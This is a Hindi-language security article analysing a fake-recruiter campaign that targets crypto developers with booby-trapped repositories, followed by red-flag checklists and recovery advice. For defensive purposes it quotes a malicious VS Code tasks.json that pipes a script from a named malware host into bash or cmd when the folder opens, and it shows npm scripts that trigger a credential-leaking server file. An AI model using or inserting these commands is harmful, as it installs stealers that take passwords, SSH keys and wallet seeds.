संक्रामक साक्षात्कार: कैसे नकली भर्तीकर्ता डेवलपर्स को हैक करते हैं
सारांश (Summary): राष्ट्र-प्रायोजित हमलों की एक नई लहर क्रिप्टो में शीर्ष डेवलपर्स को मार रही है। स्कैमर्स भर्तीकर्ता (recruiters) या CTOs का रूप धारण करते हैं और उम्मीदवार को दुर्भावनापूर्ण कोड खोलने के लिए मजबूर करते हैं। यह लेख "Martin Erazo" मामले, VS Code "tasks.json" शोषण और सुरक्षित रहने के लिए आवश्यक "बर्न प्रोटोकॉल" का विश्लेषण करता है।
अस्वीकरण: यह लेख विशिष्ट साइबर सुरक्षा घटनाओं की रिपोर्ट करता है जिसमें वास्तविक व्यक्तियों का प्रतिरूपण शामिल है। "Martin Erazo" और "Ara Vartanian" नाम हमलावरों द्वारा उपयोग किए गए व्यक्तित्व या पहचान को संदर्भित करते हैं। हमारा मानना है कि इन नामों वाले वास्तविक व्यक्ति पहचान की चोरी के निर्दोष पीड़ित हैं और दुर्भावनापूर्ण गतिविधि में शामिल नहीं हैं।
1. सही चारा: "Martin Erazo" व्यक्तित्व
यह एक संदेश के साथ शुरू होता है जो वरिष्ठ डेवलपर्स के लिए सभी सही बटन दबाता है:
- भूमिका: CTO / Lead Architect.
- बजट: $6 मिलियन की फंडिंग सुरक्षित।
- तकनीक: Web3, AI, Decentralized Infra.
हाल के पुष्टि किए गए हमलों में, "Martin Erazo" नाम का एक भर्तीकर्ता LinkedIn के माध्यम से संपर्क करता है। प्रोफ़ाइल एक वास्तविक थिएटर निर्देशक के नाम और फोटो का उपयोग करती है, लेकिन कार्य इतिहास नकली है और 2025 में अचानक "आईटी परियोजना प्रबंधन" में बदल जाता है - हैक किए गए या खरीदे गए खाते का एक क्लासिक संकेत।
स्कैम तेजी से चलता है। वे मानक एचआर स्क्रीनिंग को छोड़ देते हैं और सीधे शीर्ष प्रबंधन के साथ "तकनीकी साक्षात्कार" पर जाते हैं - इस मामले में, एक वास्तविक उद्योग CTO Ara Vartanian (वर्तमान में Limit Break में) का रूप धारण करते हैं।
लाल झंडा: प्रोजेक्ट का नाम लगातार बदलता रहता है। भर्तीकर्ता "Betfin" (एक GameFi मंच) बेच रहा है, लेकिन भेजा गया पिच डेक "SpaceXView" (एक मेटावर्स प्रोजेक्ट) के लिए है। यह विसंगति एक सुराग है कि स्कैमर्स विभिन्न अभियानों के बीच संपत्ति का पुन: उपयोग कर रहे हैं।
2. जाल: "हमारे MVP कोड पर एक नज़र डालें"
नकली "CTO" का दावा है कि उन्हें उनके MVP (Minimum Viable Product) कोड पर आपकी विशेषज्ञ नज़र की आवश्यकता है। वे GitHub रिपॉजिटरी या ZIP फ़ाइल का लिंक भेजते हैं। वे साक्षात्कार के दौरान या तुरंत बाद आपको इसे खोलने के लिए दबाव डालते हैं।
यही वह जगह है जहां हमला होता है।
वे आपकी मदद करने की इच्छा और आपके अहंकार का फायदा उठाते हैं। आपको लगता है कि आप React घटकों में बग ढूंढ रहे हैं। वास्तव में, बग एक "फीचर" है जिसे आपकी बचत चोरी करने के लिए डिज़ाइन किया गया है।
3. तकनीकी शोषण: ज़ीरो-क्लिक मैलवेयर
हमलावर "zero-click" या "low-click" कमजोरियों का उपयोग करते हैं जो देव उपकरणों को टार्गेट करते हैं। उन्हें ऐप चलाने के लिए आपकी आवश्यकता नहीं है। उन्हें बस आपको फ़ोल्डर खोलने की आवश्यकता है।
स्मोकिंग गन: .vscode/tasks.json
इस विशिष्ट मामले में, रिपॉजिटरी में एक "बूबी-ट्रैप्ड" .vscode/tasks.json फ़ाइल शामिल थी। यह फ़ाइल VS Code को बताती है कि प्रोजेक्ट कैसे बनाया जाए।
दुर्भावनापूर्ण कोड:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": यह हत्यारा ट्रिगर है। जैसे ही आप VS Code में फ़ोल्डर खोलते हैं, यह कार्य स्वचालित रूप से निष्पादित होता है।
- पेलोड: यह
vscodesettingtask.vercel.appसे एक स्क्रिप्ट डाउनलोड करने के लिए curl का उपयोग करता है - एक सेटिंग एपीआई के रूप में प्रच्छन्न ज्ञात मैलवेयर होस्ट। - परिणाम: स्क्रिप्ट मेमोरी में चलती है और Chrome पासवर्ड, सत्र कुकीज़ और SSH कुंजियों को तुरंत चोरी कर लेती है।
प्लान बी: package.json स्क्रिप्ट्स
यदि VS Code शोषण विफल हो जाता है, तो वे npm स्क्रिप्ट लगाते हैं:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
npm install या npm start चलाने से server/server.js सक्रिय हो जाता है - एक स्थानीय C2 (Command and Control) स्क्रिप्ट जो हमलावर को आपके पर्यावरण चर (AWS कुंजियाँ, वॉलेट बीज) लीक करती है।
4. लाल झंडे बनाम हरे झंडे
बहुत देर होने से पहले इसे कैसे पहचानें?
यदि आप एक डेवलपर हैं, तो "निजी रिपॉजिटरी" या ZIP फ़ाइलों को अत्यधिक अलार्म का कारण बनना चाहिए। वैध कंपनियां सार्वजनिक रिपॉजिटरी या मानकीकृत प्लेटफार्मों के माध्यम से परीक्षण कार्यों का उपयोग करती हैं।
चेतावनी: डेवलपर्स पर हमला करने का यही एकमात्र तरीका नहीं है। Discord में कोलेबोरेटर ट्रैप के बारे में पढ़ें और कैसे सप्लाई चेन हमले निर्भरता (dependencies) से समझौता करते हैं।
| 🚩 लाल झंडा (भागो) | ✅ हरा झंडा (सुरक्षित) |
|---|---|
| कोड पहले: वे नौकरी की पेशकश से पहले कोड भेजते हैं। | मानक प्रक्रिया: साक्षात्कार पहले, कोड बाद में। |
| टूटी हुई पहचान: अप्रासंगिक इतिहास वाला भर्तीकर्ता (जैसे: कलाकार से आईटी प्रबंधक बना)। | सत्यापित इतिहास: सुसंगत LinkedIn करियर पथ। |
| मेल नहीं: प्रोजेक्ट का नाम मेल नहीं खाता (Betfin बनाम SpaceXView)। | संगति: नाम, डॉक्स और साइट संरेखित हैं। |
| तात्कालिकता: "CTO इंतजार कर रहा है", "इसे अभी खोलें"। | धैर्य: वे आपके समय और कार्यक्रम का सम्मान करते हैं। |
| व्यक्तिगत ईमेल: [email protected] या अमान्य डोमेन। | कंपनी ईमेल: [email protected] (सक्रिय MX रिकॉर्ड के साथ)। |
5. सुरक्षा प्रोटोकॉल: सुरक्षित रूप से साक्षात्कार कैसे करें
यदि आप एक वरिष्ठ डेवलपर हैं, तो आपका शिकार किया जाएगा। पर्यावरण सख्त करना अनिवार्य है।
प्रोटोकॉल 1: "बर्नर" पर्यावरण
कोड परीक्षणों के लिए कभी भी अपने प्राथमिक वर्कस्टेशन का उपयोग न करें।
- वर्चुअल मशीन: VirtualBox या VMWare का उपयोग करें।
- क्लाउड देव वातावरण: GitHub Codespaces या Gitpod का उपयोग करें। ये अल्पकालिक हैं और आपकी स्थानीय वॉलेट फ़ाइलों से अलग हैं।
प्रोटोकॉल 2: फोरेंसिक जांच
अपरिचित कोड खोलने से पहले:
- .vscode/tasks.json चेक करें:
runOn: folderOpenकी तलाश करें। - package.json चेक करें: संदिग्ध preinstall या postinstall स्क्रिप्ट की तलाश करें।
- कीवर्ड खोजें:
curl,wget,os.homedir(),.ssh,walletके लिए grep करें।
प्रोटोकॉल 3: VS Code को सख्त करना
विश्व स्तर पर "Workspace Trust" को अक्षम करें।
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always.
- यह VS Code को फ़ोल्डर-स्तरीय कार्यों को निष्पादित करने से पहले अनुमति मांगने के लिए मजबूर करेगा।
6. इलाज: "बर्न प्रोटोकॉल"
यदि आपने एक दुर्भावनापूर्ण रेपो ("Martin Erazo" व्यक्तित्व द्वारा भेजे गए तरह) खोला है, तो मान लें कि आप समझौता कर चुके हैं। रोलबैक करना पर्याप्त नहीं है।
- कनेक्शन काटें: तुरंत ईथरनेट केबल खींचें।
- वॉलेट जलाएं: आपकी निजी कुंजी लीक हो गई हैं। एक साफ डिवाइस (फोन) पर नए वॉलेट बनाएं और शेष फंड ट्रांसफर करें। पुराने बीजों का कभी उपयोग न करें।
- सत्र समाप्त करें: Google, GitHub, AWS पर सभी उपकरणों से लॉग आउट करें। सभी सक्रिय सत्रों को रद्द करें।
- SSH कुंजी ऑडिट: GitHub/GitLab सेटिंग्स की जाँच करें। हमलावर अक्सर बैकडोर एक्सेस बनाए रखने के लिए अपनी SSH कुंजियाँ जोड़ते हैं। जो आप नहीं पहचानते उसे हटा दें।
- Nuke It: डिस्क को वाइप करें और OS को फिर से इंस्टॉल करें। यह सुनिश्चित करने का एकमात्र तरीका है कि रूटकिट्स चले गए हैं।
निष्कर्ष
"संक्रामक साक्षात्कार" स्कैम आपके खिलाफ आपकी विशेषज्ञता को हथियार बनाता है। यह समस्याओं को हल करने की आपकी इच्छा को टार्गेट करता है। लेकिन Web3 में, व्यामोह (Paranoia) एक पेशेवर गुण है। हर पहचान की पुष्टि करें, हर रेपो को सैंडबॉक्स करें, और कभी भी किसी "भर्तीकर्ता" पर भरोसा न करें जो आपको कोड निष्पादित करने के लिए जल्दी करता है।
संबंधित लेख
द लॉन्ग कॉन (Pig Butchering): कैसे वे आपका दिल और वॉलेट चुराते हैं
'गलत नंबर' वाले टेक्स्ट से शुरू होता है। आपकी सेवानिवृत्ति (Retirement) के नुकसान के साथ समाप्त होता है। 'Pig Butchering' घोटाले की मनोवैज्ञानिक स्क्रिप्ट का विश्लेषण।
जहाँ खेलते हो वहाँ ट्रेड मत करो: आपको अलग क्रिप्टो लैपटॉप की आवश्यकता क्यों है
आपका गेमिंग पीसी छिद्रों (holes) से भरा है। आपका फोन ट्रैकर्स से भरा है। क्यों एक अलग 'बैंकिंग डिवाइस' पर $200 खर्च करना सबसे अच्छा बीमा है जो आप खरीद सकते हैं।
हिडन बैकडोर (Hidden Backdoor): आपको अनुमतियां रद्द करने की आवश्यकता क्यों है
आपने अपना वॉलेट डिस्कनेक्ट कर दिया, लेकिन हैकर अभी भी इसे खाली कर सकता है। जानें कि 'अनलिमिटेड अप्रूवल्स' कैसे काम करते हैं और डिजिटल बैकडोर को कैसे लॉक करें।